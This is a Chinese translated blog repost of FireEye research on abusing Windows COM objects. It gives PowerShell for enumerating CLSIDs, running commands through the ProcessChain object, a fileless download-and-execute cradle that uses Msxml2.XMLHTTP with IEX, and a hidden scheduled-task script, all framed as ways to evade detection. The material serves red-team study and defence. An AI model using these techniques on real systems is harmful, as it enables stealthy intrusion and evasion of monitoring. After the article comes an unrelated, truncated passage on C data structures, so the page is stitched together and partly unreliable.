不能从远程创建com+对象_玩转COM对象

译文声明

0994d22894f892b3e59a53dce2ead2c8.png

0x00 前言

最近一段时间,渗透测试人员、红队以及恶意攻击者都在横向移动中开始使用COM对象。之前已经有其他研究者研究过COM对象,比如Matt Nelson(enigma0x3)。Matt在2017年发表了关于COM对象的一篇文章,Empire工程中也添加过几个COM对象。为了帮助红队加深对这方面内容的理解,FireEye对Windows 7和10系统上可用的COM对象进行了研究。我们发现了几个有趣的COM对象,这些对象可以用于计划任务、无文件下载执行以及命令执行。虽然这些对象本身并不是安全漏洞,但如果滥用起来可以绕过基于进程行为检测以及启发式特征检测的防御机制。

0x01 什么是COM对象

根据微软的描述,“微软组件对象模型(Component Object Model,COM)是平台无关、分布式、面向对象的一种系统,可以用来创建可交互的二进制软件组件”。COM是微软OLE(复合文档)、ActiveX(互联网支持组件)以及其他组件的技术基础。

COM最早于1990年作为语言无关的二进制互通标准创建,允许独立代码模块能够彼此交互。代码模块交互可以出现于单进程或者跨进程场景,分布式COM(DCOM)还添加了序列化机制,允许通过网络进行远程过程调用(RPC)。

“COM对象”这个词指的是一个可执行代码section,其中实现了派生自IUnknown的一个或多个接口。IUnknown是包含3个方法的一个接口,支持对象生命周期引用技术以及发现其他接口。每个COM对象都对应于唯一的二进制标识符,这些全局唯一标识符为128比特(16字节),通常被称为GUID。当GUID用来标识某个COM对象时,就成为CLSID(类标识符),当用来标识某个接口时,就成为IID(接口标识符)。某些CLSID还包含可读的文本,即ProgID

由于COM是一个二进制互通标准,因此COM对象在设计之初就可以通过不同语言来实现和使用。虽然COM对象通常会在调用进程的地址空间中进行实例化,但我们也可以在进程之外,通过进程间通信代理调用方式来运行,甚至也可以远程方式在不同机器之间运行。

Windows注册表中包含一组键值,可以使系统将一个CLSID映射到底层代码实现(在DLL或者EXE中),从而创建COM对象。

0x02 研究方法

HKEY_CLASSES_ROOT\CLSID这个注册表项中包含枚举COM对象所需的所有信息,包括CLSID以及ProgID。CLSID是与COM类对象关联的一个全局唯一标识符,ProgID是编程上方便使用的一个字符串,可以表示底层CLSID。

我们可以使用如下Powershell命令来获取CLSID列表:

New-PSDrive -PSProvider registry -Root HKEY_CLASSES_ROOT -Name HKCR
Get-ChildItem -Path HKCR:\CLSID -Name | Select -Skip 1 > clsids.txt

图1. 枚举HKCR表项中的CLSID

输出结果如图2所示。

{0000002F-0000-0000-C000-000000000046}{00000300-0000-0000-C000-000000000046}{00000301-A8F2-4877-BA0A-FD2B6645FB94}{00000303-0000-0000-C000-000000000046}{00000304-0000-0000-C000-000000000046}{00000305-0000-0000-C000-000000000046}{00000306-0000-0000-C000-000000000046}{00000308-0000-0000-C000-000000000046}{00000309-0000-0000-C000-000000000046}{0000030B-0000-0000-C000-000000000046}{00000315-0000-0000-C000-000000000046}{00000316-0000-0000-C000-000000000046}

图2. 从HKCR中提取的部分CLSID列表 

我们可以使用这个CLSID列表来依次实例化每个对象,然后枚举每个COM对象公开的方法和属性。PowerShell中包含一个Get-Member cmdlet,可以用来获取某个对象对应的方法及属性。使用PowerShell脚本枚举该信息的过程如图3所示。在本次研究中,我们使用普通用户权限来模拟不具备管理员权限的场景,这是较为苛刻的场景。在这种场景下,我们可以深入了解当时可用的COM对象。

$Position  = 1$Filename = "win10-clsid-members.txt"$inputFilename = "clsids.txt"ForEach($CLSID in Get-Content $inputFilename) {      Write-Output "$($Position) - $($CLSID)"      Write-Output "------------------------" | Out-File $Filename -Append      Write-Output $($CLSID) | Out-File $Filename -Append      $handle = [activator]::CreateInstance([type]::GetTypeFromCLSID($CLSID))      $handle | Get-Member | Out-File $Filename -Append      $Position += 1}

图3. 用来枚举可用方法及属性的PowerShell脚本

如果运行该脚本,我们可以会看到一些有趣的行为,比如任意应用被启动、系统冻结或者脚本被挂起。这些问题大多数可以通过关闭被启动的应用或者终止被生成的进程来解决。

获取所有CLSID以及对应的方法及属性后,我们可以开始搜索较为有趣的COM对象。大多数COM服务器(实现COM对象的代码)通常会在DLL中实现,而DLL的路径存放在注册表键值中(比如InprocServer32)。这一点非常有用,因为我们可能需要通过逆向分析来理解未公开的COM对象。

在Windows 7上,我们可以枚举到8,282个COM对象,Windows 10在这个基础上又新增了3,250个COM对象。非微软提供的COM对象通常会被忽略,因为我们无法保证这些对象在目标机器上同样存在,因此这些对象对红队所能提供的帮助也较为有限。我们在研究过程中也将来自Windows SDK中的COM对象囊括在内,这样也能适用于开发者所使用的目标主机。

一旦获取对象所属成员,我们可以使用基于关键字的搜索方法,快速得到一些结果。在本次研究中,我们所使用的关键字为:executeexecspawnlaunch以及run

{F1CA3CE9-57E0-4862-B35F-C55328F05F1C}这个COM对象(WatWeb.WatWebObject)为例,这是Windows 7上的一个COM对象,该对象会对外提供名为LaunchSystemApplication的一个方法,如图4所示:

1a965821b430f1dab4bb3c3bf3a76ad2.png

图4. WatWeb.WatWebObject方法中包含一个有趣的LaunchSystemApplication方法

该对象对应的InprocServer32表项为C:\windows\system32\wat\watweb.dll,这是微软的WGA(Windows正版增值计划)产品密钥验证系统的一个组件。LaunchSystemApplication方法需要3个参数,但这个COM对象并没有详细公开的参考文档,因此我们需要进行逆向分析,此时我们需要涉及到一些汇编代码。

一旦我们使用拿手的工具(这里为IDA Pro)加载C:\windows\system32\wat\watweb.dll后,我们就可以开始寻找定义该方法的具体位置。幸运的是,在这个对象中,微软公开了调试符号,这样逆向分析起来就更加方便。观察汇编代码,可以看到LaunchSystemApplication会调用LaunchSystemApplicationInternal,而与我们猜测的一致,后者会调用CreateProcess来启动应用。相关逻辑参考图5中Hex-Rays反编译器的伪代码结果:

3e6e2e999413c85e83e72bc078aa8b3e.png

图5. 在Hex-Rays伪代码中可以看到LaunchSystemApplicationInternal会调用CreateProcessW

但这个COM对象是否可以创建任意进程呢?用户可以控制传递给CreateProcess的参数,并且该参数派生自传递给上一级函数的参数。然而我们需要注意到一点,在调用CreateProcess之前,代码首先会调用CWgpOobWebObjectBaseT::IsApprovedApplication。该方法对应的Hex-Rays伪代码如图6所示。

c68c349345ee33be10b7054eb7331af6.png

图6. IsApprovedApplication方法对应的Hex-Rays伪代码

用户可控的字符串需要与特定的模式进行匹配。在这种情况下,该字符串必须匹配slui.exe。此外,用户可控的字符串会被附加到系统路径尾部,这意味着我们有必要替换真实的slui.exe来绕过这种检测机制。不幸的是,微软使用的这种校验机制使我们无法将该方法当成通用的进程启动方式。

在其他情况下,代码执行会更加简单一些。比如,ProcessChain类(对应的CLSID{E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E})的实现逻辑位于C:\Program Files (x86)\Windows Kits\10\App Certification Kit\prchauto.dll中。这个COM类分析起来非常方便,我们不需要查看任何反汇编代码,因为prchauto.dll中包含一个TYPELIB资源,其中包含一个COM类型库,可以使用Oleview.exe来查看。ProcessChainLib对应的类型库如图7所示,该库对外公开一个CommandLine类以及一个Start方法。Start方法参数接受对某个Boolean值的引用。

ff854ad900e7c998af3a784b878426c7.png

图7. 可以使用Oleview.exe的接口定义语言来分析ProcessChainLib对应的类型库

基于这些信息,我们可以通过图8方式来运行命令:

$handle = [activator]::CreateInstance([type]::GetTypeFromCLSID("E430E93D-09A9-4DC5-80E3-CBB2FB9AF28E"))$handle.CommandLine = "cmd /c whoami"$handle.Start([ref]$True)

图8. 使用ProcessChainLib COM服务器来启动进程

通过这种方式枚举和检查COM对象,我们还可以找到其他有趣的信息。

0x03 无文件下载及执行

比如,F5078F35-C551-11D3-89B9-0000F81FE221}这个COM对象(Msxml2.XMLHTTP.3.0)对外提供了一个XML HTTP 3.0功能,可以用来下载任意代码并执行,无需将payload写入磁盘,也不会触发基于System.Net.WebClient的常用检测规则。XML HTTP 3.0对象通常用来发起AJAX请求。在这种情况下,获取数据的方式非常简单,直接使用Invoke-Expressioncmdlet(IEX)即可。

如图9所示,我们可以在本地执行代码:

$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221")); $o.Open("GET", "http://127.0.0.1/payload", $False); $o.Send(); IEX $o.responseText;

图9. 不需要使用System.Net.WebClient实现的无文件下载

0x04 计划任务

还有{0F87369F-A4E5-4CFC-BD3E-73E6154572DD},这个COM对象实现了Schedule.Service类,用来操作Windows计划任务服务(Task Scheduler Service)。这个COM对象允许特权用户在目标主机上(包括远程主机)设定计划任务,无需使用schtasks.exe程序或者at命令。

$TaskName = [Guid]::NewGuid().ToString()$Instance = [activator]::CreateInstance([type]::GetTypeFromProgID("Schedule.Service"))$Instance.Connect()$Folder = $Instance.GetFolder("")$Task = $Instance.NewTask(0)$Trigger = $Task.triggers.Create(0)$Trigger.StartBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay))$Trigger.EndBoundary = Convert-Date -Date ((Get-Date).addSeconds($Delay + 120))$Trigger.ExecutionTimelimit = "PT5M"$Trigger.Enabled = $True$Trigger.Id = $Taskname$Action = $Task.Actions.Create(0)$Action.Path = “cmd.exe”$Action.Arguments = “/c whoami”$Action.HideAppWindow = $True$Folder.RegisterTaskDefinition($TaskName, $Task, 6, "", "", 3)function Convert-Date {               param(             [datetime]$Date        )               PROCESS {               $Date.Touniversaltime().tostring("u") -replace " ","T"        }}

图10. 创建计划任务

0x05 总结

COM对象非常强大、功能丰富,并且已经集成到Windows系统中,这意味着这种功能基本上都是开箱可用的。COM对象可以用来绕过各种检测模式,包括命令行参数、PowerShell日志记录以及启发式检测。在后续文章中,我们将继续寻找其他有趣的COM对象。

1aba91538222c25206ce36706128aac0.gif

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C语言是一种广泛使用的编程语言,它具有高效、灵活、可移植性强等特点,被广泛应用于操作系统、嵌入式系统、数据库、编译器等领域的开发。C语言的基本语法包括变量、数据类型、运算符、控制结构(如if语句、循环语句等)、函数、指针等。在编写C程序时,需要注意变量的声明和定义、指针的使用、内存的分配与释放等问题。C语言中常用的数据结构包括: 1. 数组:一种存储同类型数据的结构,可以进行索引访问和修改。 2. 链表:一种存储不同类型数据的结构,每个节点包含数据和指向下一个节点的指针。 3. 栈:一种后进先出(LIFO)的数据结构,可以通过压入(push)和弹出(pop)操作进行数据的存储和取出。 4. 队列:一种先进先出(FIFO)的数据结构,可以通过入队(enqueue)和出队(dequeue)操作进行数据的存储和取出。 5. 树:一种存储具有父子关系的数据结构,可以通过中序遍历、前序遍历和后序遍历等方式进行数据的访问和修改。 6. 图:一种存储具有节点和边关系的数据结构,可以通过广度优先搜索、深度优先搜索等方式进行数据的访问和修改。 这些数据结构在C语言中都有相应的实现方式,可以应用于各种不同的场景。C语言中的各种数据结构都有其优缺点,下面列举一些常见的数据结构的优缺点: 数组: 优点:访问和修改元素的速度非常快,适用于需要频繁读取和修改数据的场合。 缺点:数组的长度是固定的,不适合存储大小不固定的动态数据,另外数组在内存中是连续分配的,当数组较大时可能会导致内存碎片化。 链表: 优点:可以方便地插入和删除元素,适用于需要频繁插入和删除数据的场合。 缺点:访问和修改元素的速度相对较慢,因为需要遍历链表找到指定的节点。 栈: 优点:后进先出(LIFO)的特性使得栈在处理递归和括号匹配等问题时非常方便。 缺点:栈的空间有限,当数据量较大时可能会导致栈溢出。 队列: 优点:先进先出(FIFO)的特性使得

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值